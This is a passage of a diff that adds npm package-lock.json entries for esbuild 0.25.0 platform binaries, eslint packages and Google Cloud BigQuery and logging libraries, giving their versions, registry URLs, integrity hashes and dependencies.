"resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.0.tgz", + "integrity": "sha512-PTyWCYYiU0+1eJKmw21lWtC+d08JDZPQ5g+kFyxP0V+es6VPPSUhM6zk8iImp2jbV6GwjX4pap0JFbUQN65X1g==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.0.tgz", + "integrity": "sha512-grvv8WncGjDSyUBjN9yHXNt+cq0snxXbDxy5pJtzMKGmmpPxeAmAhWxXI+01lU5rwZomDgD3kJwulEnhTRUd6g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.0.tgz", + "integrity": "sha512-m/ix7SfKG5buCnxasr52+LI78SQ+wgdENi9CqyCXwjVR2X4Jkz+BpC3le3AoBPYTC9NHklwngVXvbJ9/Akhrfg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/darwin-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.0.tgz", + "integrity": "sha512-mVwdUb5SRkPayVadIOI78K7aAnPamoeFR2bT5nszFUZ9P8UpK4ratOdYbZZXYSqPKMHfS1wdHCJk1P1EZpRdvw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/darwin-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.0.tgz", + "integrity": "sha512-DgDaYsPWFTS4S3nWpFcMn/33ZZwAAeAFKNHNa1QN0rI4pUjgqf0f7ONmXf6d22tqTY+H9FNdgeaAa+YIFUn2Rg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.0.tgz", + "integrity": "sha512-VN4ocxy6dxefN1MepBx/iD1dH5K8qNtNe227I0mnTRjry8tj5MRk4zprLEdG8WPyAPb93/e4pSgi1SoHdgOa4w==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/freebsd-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.0.tgz", + "integrity": "sha512-mrSgt7lCh07FY+hDD1TxiTyIHyttn6vnjesnPoVDNmDfOmggTLXRv8Id5fNZey1gl/V2dyVK1VXXqVsQIiAk+A==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-arm": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.0.tgz", + "integrity": "sha512-vkB3IYj2IDo3g9xX7HqhPYxVkNQe8qTK55fraQyTzTX/fxaDtXiEnavv9geOsonh2Fd2RMB+i5cbhu2zMNWJwg==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.0.tgz", + "integrity": "sha512-9QAQjTWNDM/Vk2bgBl17yWuZxZNQIF0OUUuPZRKoDtqF2k4EtYbpyiG5/Dk7nqeK6kIJWPYldkOcBqjXjrUlmg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-ia32": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.0.tgz", + "integrity": "sha512-43ET5bHbphBegyeqLb7I1eYn2P/JYGNmzzdidq/w0T8E2SsYL1U6un2NFROFRg1JZLTzdCoRomg8Rvf9M6W6Gg==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-loong64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.0.tgz", + "integrity": "sha512-fC95c/xyNFueMhClxJmeRIj2yrSMdDfmqJnyOY4ZqsALkDrrKJfIg5NTMSzVBr5YW1jf+l7/cndBfP3MSDpoHw==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-mips64el": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.0.tgz", + "integrity": "sha512-nkAMFju7KDW73T1DdH7glcyIptm95a7Le8irTQNO/qtkoyypZAnjchQgooFUDQhNAy4iu08N79W4T4pMBwhPwQ==", + "cpu": [ + "mips64el" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-ppc64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.0.tgz", + "integrity": "sha512-NhyOejdhRGS8Iwv+KKR2zTq2PpysF9XqY+Zk77vQHqNbo/PwZCzB5/h7VGuREZm1fixhs4Q/qWRSi5zmAiO4Fw==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-riscv64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.0.tgz", + "integrity": "sha512-5S/rbP5OY+GHLC5qXp1y/Mx//e92L1YDqkiBbO9TQOvuFXM+iDqUNG5XopAnXoRH3FjIUDkeGcY1cgNvnXp/kA==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-s390x": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.0.tgz", + "integrity": "sha512-XM2BFsEBz0Fw37V0zU4CXfcfuACMrppsMFKdYY2WuTS3yi8O1nFOhil/xhKTmE1nPmVyvQJjJivgDT+xh8pXJA==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.0.tgz", + "integrity": "sha512-9yl91rHw/cpwMCNytUDxwj2XjFpxML0y9HAOH9pNVQDpQrBxHy01Dx+vaMu0N1CKa/RzBD2hB4u//nfc+Sd3Cw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/netbsd-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.0.tgz", + "integrity": "sha512-RuG4PSMPFfrkH6UwCAqBzauBWTygTvb1nxWasEJooGSJ/NwRw7b2HOwyRTQIU97Hq37l3npXoZGYMy3b3xYvPw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/netbsd-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.0.tgz", + "integrity": "sha512-jl+qisSB5jk01N5f7sPCsBENCOlPiS/xptD5yxOx2oqQfyourJwIKLRA2yqWdifj3owQZCL2sn6o08dBzZGQzA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/openbsd-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.0.tgz", + "integrity": "sha512-21sUNbq2r84YE+SJDfaQRvdgznTD8Xc0oc3p3iW/a1EVWeNj/SdUCbm5U0itZPQYRuRTW20fPMWMpcrciH2EJw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/openbsd-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.0.tgz", + "integrity": "sha512-2gwwriSMPcCFRlPlKx3zLQhfN/2WjJ2NSlg5TKLQOJdV0mSxIcYNTMhk3H3ulL/cak+Xj0lY1Ym9ysDV1igceg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/sunos-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.0.tgz", + "integrity": "sha512-bxI7ThgLzPrPz484/S9jLlvUAHYMzy6I0XiU1ZMeAEOBcS0VePBFxh1JjTQt3Xiat5b6Oh4x7UC7IwKQKIJRIg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.0.tgz", + "integrity": "sha512-ZUAc2YK6JW89xTbXvftxdnYy3m4iHIkDtK3CLce8wg8M2L+YZhIvO1DKpxrd0Yr59AeNNkTiic9YLf6FTtXWMw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-ia32": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.0.tgz", + "integrity": "sha512-eSNxISBu8XweVEWG31/JzjkIGbGIJN/TrRoiSVZwZ6pkC6VX4Im/WV2cz559/TXLcYbcrDN8JtKgd9DJVIo8GA==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.0.tgz", + "integrity": "sha512-ZENoHJBxA20C2zFzh6AI4fT6RraMzjYw4xKWemRTRmRVtN9c5DcH9r/f2ihEkMjOW5eGgrwCslG/+Y/3bL+DHQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@eslint-community/eslint-utils": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.4.0.tgz", + "integrity": "sha512-1/sA4dwrzBAyeUoQ6oxahHKmrZvsnLCg4RfxW3ZFGGmQkSNQPFNLV9CUEFQP1x9EYXHTo5p6xdhZM1Ne9p/AfA==", + "dependencies": { + "eslint-visitor-keys": "^3.3.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "peerDependencies": { + "eslint": "^6.0.0 || ^7.0.0 || >=8.0.0" + } + }, + "node_modules/@eslint-community/eslint-utils/node_modules/eslint-visitor-keys": { + "version": "3.4.1", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.1.tgz", + "integrity": "sha512-pZnmmLwYzf+kWaM/Qgrvpen51upAktaaiI01nsJD/Yr3lMOdNtq0cxkrrg16w64VtisN6okbs7Q8AfGqj4c9fA==", + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@eslint-community/regexpp": { + "version": "4.10.0", + "resolved": "https://registry.npmjs.org/@eslint-community/regexpp/-/regexpp-4.10.0.tgz", + "integrity": "sha512-Cu96Sd2By9mCNTx2iyKOmq10v22jUVQv0lQnlGNy16oE9589yE+QADPbrMGCkA51cKZSg3Pu/aTJVTGfL/qjUA==", + "engines": { + "node": "^12.0.0 || ^14.0.0 || >=16.0.0" + } + }, + "node_modules/@eslint/eslintrc": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-2.1.4.tgz", + "integrity": "sha512-269Z39MS6wVJtsoUl10L60WdkhJVdPG24Q4eZTH3nnF6lpvSShEK3wQjDX9JRWAUPvPh7COouPpU9IrqaZFvtQ==", + "dependencies": { + "ajv": "^6.12.4", + "debug": "^4.3.2", + "espree": "^9.6.0", + "globals": "^13.19.0", + "ignore": "^5.2.0", + "import-fresh": "^3.2.1", + "js-yaml": "^4.1.0", + "minimatch": "^3.1.2", + "strip-json-comments": "^3.1.1" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@eslint/eslintrc/node_modules/globals": { + "version": "13.24.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-13.24.0.tgz", + "integrity": "sha512-AhO5QUcj8llrbG09iWhPU2B204J1xnPeL8kQmVorSsy+Sjj1sk8gIyh6cUocGmH4L0UuhAJy+hJMRA4mgA4mFQ==", + "dependencies": { + "type-fest": "^0.20.2" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@eslint/js": { + "version": "8.57.0", + "resolved": "https://registry.npmjs.org/@eslint/js/-/js-8.57.0.tgz", + "integrity": "sha512-Ys+3g2TaW7gADOJzPt83SJtCDhMjndcDMFVQ/Tj9iA1BfJzFKD9mAUXT3OenpuPHbI6P/myECxRJrofUsDx/5g==", + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + } + }, + "node_modules/@google-cloud/bigquery": { + "version": "5.10.0", + "resolved": "https://registry.npmjs.org/@google-cloud/bigquery/-/bigquery-5.10.0.tgz", + "integrity": "sha512-kHwPT3O5pihjlhZ4wpNElovv/RY2hyz5MdgON1UlwFM9bVA8kXqdUWS09owjVhHKaHqBxliUpG0DAwjrKHqY7Q==", + "dependencies": { + "@google-cloud/common": "^3.1.0", + "@google-cloud/paginator": "^3.0.0", + "@google-cloud/promisify": "^2.0.0", + "arrify": "^2.0.1", + "big.js": "^6.0.0", + "duplexify": "^4.0.0", + "extend": "^3.0.2", + "is": "^3.3.0", + "p-event": "^4.1.0", + "stream-events": "^1.0.5", + "uuid": "^8.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/bigquery/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/@google-cloud/bigquery/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/common": { + "version": "3.9.0", + "resolved": "https://registry.npmjs.org/@google-cloud/common/-/common-3.9.0.tgz", + "integrity": "sha512-R9PfmCKbpOizvcLY+fz/TS4HdOQhvmf4EY4xEXvWnotGbGXujuTLJTJ2URy8BGT8TDxlh6gjjfEwjJ8McnNPIg==", + "dependencies": { + "@google-cloud/projectify": "^2.0.0", + "@google-cloud/promisify": "^2.0.0", + "arrify": "^2.0.1", + "duplexify": "^4.1.1", + "ent": "^2.2.0", + "extend": "^3.0.2", + "google-auth-library": "^7.9.2", + "retry-request": "^4.2.2", + "teeny-request": "^7.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/common/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/@google-cloud/logging": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/@google-cloud/logging/-/logging-11.1.0.tgz", + "integrity": "sha512-S3Zsd+HZxIdZgDZByJ+2GaSQ8rA5OLfdZoZ9Ys1iSZ4HRIhO9ZxlXbmGZgGK9JJ2GaXp7Rux4K4LpkqoYPKnEg==", + "dependencies": { + "@google-cloud/common": "^5.0.0", + "@google-cloud/paginator": "^5.0.0", + "@google-cloud/projectify": "^4.0.0", + "@google-cloud/promisify": "^4.0.0", + "arrify": "^2.0.1", + "dot-prop": "^6.0.0", + "eventid": "^2.0.0", + "extend": "^3.0.2", + "gcp-metadata": "^6.0.0", + "google-auth-library": "^9.0.0", + "google-gax": "^4.0.3", + "on-finished": "^2.3.0", + "pumpify": "^2.0.1", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging-bunyan": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/@google-cloud/logging-bunyan/-/logging-bunyan-5.1.0.tgz", + "integrity": "sha512-D2Rg5nb+onjWre4eEowWyNmVF1RN7WThWdu1cCOcTMVOoVEGJphMxrBo9VQKQmkqdlAUG4NaM6i2sqieISQDsg==", + "dependencies": { + "@google-cloud/logging": "^11.0.0", + "google-auth-library": "^9.0.0" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "bunyan": "*" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/agent-base": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.0.tgz", + "integrity": "sha512-o/zjMZRhJxny7OyEF+Op8X+efiELC7k7yOjMzgfzVqOzXqkBkWI79YoTdOtsuWd5BWhAGAuOY/Xa6xpiaWXiNg==", + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/gaxios": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-6.1.0.tgz", + "integrity": "sha512-EIHuesZxNyIkUGcTQKQPMICyOpDD/bi+LJIJx+NLsSGmnS7N+xCLRX5bi4e9yAu9AlSZdVq+qlyWWVuTh/483w==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.9" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/gcp-metadata": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.0.0.tgz", + "integrity": "sha512-Ozxyi23/1Ar51wjUT2RDklK+3HxqDr8TLBNK8rBBFQ7T85iIGnXnVusauj06QyqCXRFZig8LZC+TUddWbndlpQ==", + "dependencies": { + "gaxios": "^6.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/google-auth-library": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.0.0.tgz", + "integrity": "sha512-IQGjgQoVUAfOk6khqTVMLvWx26R+yPw9uLyb1MNyMQpdKiKt0Fd9sp4NWoINjyGHR8S3iw12hMTYK7O8J07c6Q==", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^6.0.0", + "gcp-metadata": "^6.0.0", + "gtoken": "^7.0.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/gtoken": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-7.0.1.tgz", + "integrity": "sha512-KcFVtoP1CVFtQu0aSk3AyAt2og66PFhZAlkUOuWKwzMLoulHXG5W5wE5xAnHb+yl3/wEFoqGW7/cDGMU8igDZQ==", + "dependencies": { + "gaxios": "^6.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/https-proxy-agent": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.1.tgz", + "integrity": "sha512-Eun8zV0kcYS1g19r78osiQLEFIRspRUDd9tIfBCTBPBeMieF/EsJNL8VI3xOIdYRDEkjQnqOYPsZ2DsWsVsFwQ==", + "dependencies": { + "agent-base": "^7.0.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/@google-cloud/logging-bunyan/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@google-cloud/logging-min": { + "version": "10.4.0", + "resolved": "https://registry.npmjs.org/@google-cloud/logging-min/-/logging-min-10.4.0.tgz", + "integrity": "sha512-TcblDYAATO9hHcDcWYFh+vqt3pAV7Qddaih1JK3cpkzLa+BWjD5gAVAWww8W9Wr5yxOX+8CkssanH/xSS4n76Q==", + "dependencies": { + "@google-cloud/common": "^4.0.0", + "@google-cloud/paginator": "^4.0.0", + "@google-cloud/projectify": "^3.0.0", + "@google-cloud/promisify": "^3.0.0", + "arrify": "^2.0.1", + "dot-prop": "^6.0.0", + "eventid": "^2.0.0", + "extend": "^3.0.2", + "gcp-metadata": "^4.0.0", + "google-auth-library": "^8.0.2", + "google-gax": "^3.5.2", + "on-finished": "^2.3.0", + "pumpify": "^2.0.1", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/@google-cloud/common": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/@google-cloud/common/-/common-4.0.3.tgz", + "integrity": "sha512-fUoMo5b8iAKbrYpneIRV3z95AlxVJPrjpevxs4SKoclngWZvTXBSGpNisF5+x5m+oNGve7jfB1e6vNBZBUs7Fw==", + "dependencies": { + "@google-cloud/projectify": "^3.0.0", + "@google-cloud/promisify": "^3.0.0", + "arrify": "^2.0.1", + "duplexify": "^4.1.1", + "ent": "^2.2.0", + "extend": "^3.0.2", + "google-auth-library": "^8.0.2", + "retry-request": "^5.0.0", + "teeny-request": "^8.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/@google-cloud/paginator": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/@google-cloud/paginator/-/paginator-4.0.1.tgz", + "integrity": "sha512-6G1ui6bWhNyHjmbYwavdN7mpVPRBtyDg/bfqBTAlwr413On2TnFNfDxc9UhTJctkgoCDgQXEKiRPLPR9USlkbQ==", + "dependencies": { + "arrify": "^2.0.0", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/@google-cloud/projectify": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-3.0.0.tgz", + "integrity": "sha512-HRkZsNmjScY6Li8/kb70wjGlDDyLkVk3KvoEo9uIoxSjYLJasGiCch9+PqRVDOCGUFvEIqyogl+BeqILL4OJHA==", + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/@google-cloud/promisify": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-3.0.1.tgz", + "integrity": "sha512-z1CjRjtQyBOYL+5Qr9DdYIfrdLBe746jRTYfaYU6MeXkqp7UfYs/jX16lFFVzZ7PGEJvqZNqYUEtb1mvDww4pA==", + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/gcp-metadata": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-4.3.1.tgz", + "integrity": "sha512-x850LS5N7V1F3UcV7PoupzGsyD6iVwTVvsh3tbXfkctZnBnjW5yu5z1/3k3SehF7TyoTIe78rJs02GMMy+LF+A==", + "dependencies": { + "gaxios": "^4.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/gcp-metadata/node_modules/gaxios": { + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-4.3.3.tgz", + "integrity": "sha512-gSaYYIO1Y3wUtdfHmjDUZ8LWaxJQpiavzbF5Kq53akSzvmVg0RfyOcFDbO1KJ/KCGRFz2qG+lS81F0nkr7cRJA==", + "dependencies": { + "abort-controller": "^3.0.0", + "extend": "^3.0.2", + "https-proxy-agent": "^5.0.0", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.7" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/google-auth-library": { + "version": "8.9.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-8.9.0.tgz", + "integrity": "sha512-f7aQCJODJFmYWN6PeNKzgvy9LI2tYmXnzpNDHEjG5sDNPgGb2FXQyTBnXeSH+PAtpKESFD+LmHw3Ox3mN7e1Fg==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^5.0.0", + "gcp-metadata": "^5.3.0", + "gtoken": "^6.1.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/google-auth-library/node_modules/gcp-metadata": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-5.3.0.tgz", + "integrity": 